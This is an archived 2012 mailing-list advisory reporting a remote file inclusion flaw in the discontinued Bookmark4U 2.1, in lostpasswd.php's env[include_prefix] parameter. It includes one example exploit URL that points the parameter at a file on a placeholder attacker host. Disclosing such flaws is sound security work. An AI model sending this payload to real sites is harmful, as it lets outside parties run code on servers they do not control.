[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI
From: BugsNotHugs <bugsnothugs@xxxxxxxxx>
Date: Mon, 02 Jul 2012 01:01:33 -0600


vendor - http://bookmark4u.sourceforge.net/
version - 2.1
solution - product discontinued

example -http://[target]/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://[attacker]/path/to/file.txt???

Prev by Date: IBM developerWorks ncp (Nigel's Capacity Planning) 2.1 Remote Information Disclosure
Next by Date: [ MDVSA-2012:096-1 ] python
Previous by thread: IBM developerWorks ncp (Nigel's Capacity Planning) 2.1 Remote Information Disclosure
Next by thread: [ MDVSA-2012:096-1 ] python
Index(es):
- Date
- Thread